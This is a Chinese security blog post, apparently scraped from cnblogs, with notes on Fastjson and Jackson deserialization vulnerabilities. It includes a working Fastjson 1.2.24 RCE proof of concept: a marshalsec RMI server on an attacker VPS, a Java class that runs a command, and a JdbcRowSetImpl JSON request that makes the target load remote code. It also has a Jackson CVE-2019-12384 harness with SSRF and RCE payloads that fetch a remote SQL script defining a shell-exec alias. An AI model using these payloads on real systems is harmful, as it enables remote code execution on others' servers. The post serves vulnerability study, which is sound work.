zoukankan      html  css  js  c++  java
  • [Todo]Fastjson/Jackson组件漏洞

    Fastjson

    漏洞线

    fastjson < 1.2.24 RCE 2017
    fastjson <=1.2.27 RCE 2019-7
    fastjson <1.2.60 拒绝服务 2019-9
    fastjson <=1.2.60 RCE 2019-9
    fastjson <1.2.69 反序列化远程代码执行 2020-6

    参考链接

    https://xz.aliyun.com/u/9272 //系列文章

    fastjson 1.2.24-RCE

    1.2.24及之前没有任何防御,并且autotype默认开启
    fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
    复现 参考链接
    在自己的vps里开启rmi或者ldap服务,使用marshalsec快速开启rmi或ldap服务

    git clone https://github.com/mbechler/marshalsec
    mvn clean package -DskipTests //下载marshalsec,使用maven编译jar包
    

    安装完成好后,新建文件,复制代码,命名为TouchFile.java (注:红体就是要执行的命令,每次换命令,都要重新编译文件)

    // javac TouchFile.java
    import java.lang.Runtime;
    import java.lang.Process;
    
    public class TouchFile {
    static {
    try {
    Runtime rt = Runtime.getRuntime();
    String[] commands = {"touch", "/tmp/success"};//执行命令处
    Process pc = rt.exec(commands);
    pc.waitFor();
    } catch (Exception e) {
    // do nothing}
    }
    }
    

    开启rmi或ldap服务 4444是上方服务的端口

    java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://vpsIP:4444/#TouchFile" 9999
    

    POC:

    POST / HTTP/1.1
    Host: your-ip:8090
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/json
    Content-Length: 160
    
    {
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://vpsIP:9999/TouchFile",
            "autoCommit":true
        }
    }
    

    回显500

    监听返回连接

    Jackson

    CVE-2019-12384

    参考链接 FB 平安银行翻译
    原文doyinsec

    漏洞影响

    本次漏洞有比较鸡肋的地方,就是依赖的第三方jar包有点多,除去jackson自身的jar包以外还需要logback-core和h2,具体的pom配置如下:

    <dependency>
        <groupId>com.fasterxml.jackson.core</groupId>
        <artifactId>jackson-databind</artifactId>
        <version>2.9.8</version>
    </dependency>
    
    <!--https://mvnrepository.com/artifact/ch.qos.logback/logback-core -->
    <dependency>
        <groupId>ch.qos.logback</groupId>
        <artifactId>logback-core</artifactId>
        <version>1.3.0-alpha4</version>
    </dependency>
    
    <!--https://mvnrepository.com/artifact/com.h2database/h2 -->
    <dependency>
        <groupId>com.h2database</groupId>
        <artifactId>h2</artifactId>
        <version>1.4.199</version>
        <scope>test</scope>
    </dependency>
    <dependency>
        <groupId>com.h2database</groupId>
        <artifactId>h2</artifactId>
        <version>1.4.199</version>
        <scope>compile</scope>
    </dependency> 
    

    漏洞利用

    JackonSerial.java
    
    import com.fasterxml.jackson.databind.ObjectMapper;
    
    import com.fasterxml.jackson.databind.SerializationFeature;
    
    import org.h2.Driver;
    
    public class JackonSerial {
    
        public static void main(String[] args) throws Exception {
    
            //一定要实例化Driver否则会报错
    
            Class.forName("org.h2.Driver").newInstance();
    
            System.out.println("Mapping");
    
            //该条payload用于SSRF的复现
    
            String jsonStr1 = "["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://127.0.0.1:8005/~/test"}]";
    
            //该条payload用于RCE的复现
    
            String jsonStr2 = "["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost/inject.sql'"}]";
    
            ObjectMapper mapper = new ObjectMapper();
    
            mapper.enableDefaultTyping();
    
            mapper.configure(SerializationFeature.FAIL_ON_EMPTY_BEANS, false);
    
            System.out.println("Serializing");
    
            Object obj = mapper.readValue(jsonStr1, java.lang.Object.class)
    
            System.out.println("objectified");
    
            System.out.println("stringified: " + mapper.writeValueAsString(obj));
    
        }
    
    }
    
    inject.sql
    
    CREATE ALIASSHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException{
    
        String[] command = {"bash", "-c", cmd};
    
        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\A");
    
        return s.hasNext() ? s.next() : "";  }
    
    $$;
    
    CALL SHELLEXEC('open/Applications/Calculator.app/')
    

    漏洞原理分析
    Jackson在进行序列化的时候会循环调用序列化对象所属类的每一个get方法,当调用getConnection()方法的时候,就去再去调DriverManager从而去链接远程的数据库,这也就是造成SSRF的原因

    public Connection getConnection() throws SQLException {
    
        return this.getUser() == null ? DriverManager.getConnection(this.url) : DriverManager.getConnection(this.url, this.getUser(), this.getPassword());
    
    }
    

    RCE
    先介绍一下jdbc:h2:mem: 这种写法用于h2操作内存表,并且能在内存中执行sql语句,然后再通过RUNSCRIPT FROM 'http://localhost/inject.sql'来执行从远程获取的sql文件,当然此处改成直接执行本地语句造成命令执行也是可以的。

    因为这些执行都是在本地应该内存中的,而本地代码就是java,就是只需要在sql里面写一个java代码的函数,通过CALL来调用,变回造成java代码在本地应用执行从而造成RCE,RCE的关键调用栈如下:

    总结
    1、这个漏洞的利用有两个特别鸡肋的点:

    第一点, 它需要依赖两个jar才能造成rce漏洞;
    
    第二点, 注意这个漏洞的触发,是在序列化恶意的对象的时候触发的,而jackjson大部分情况在web中都是用于处理去反序列化前端传入的json数据的。
    
    2、相同的套路在fastjson也是可以造成RCE的,但是利用同样鸡肋。
  • 相关阅读:
    E
    D
    C
    B
    Python
    IDEA 设置资源目录
    光猫指示灯含义
    IO模型
    Linux 总目录
    Linux python 使用
  • 原文地址:https://www.cnblogs.com/rookieDanny/p/13097795.html
Copyright © 2011-2022 走看看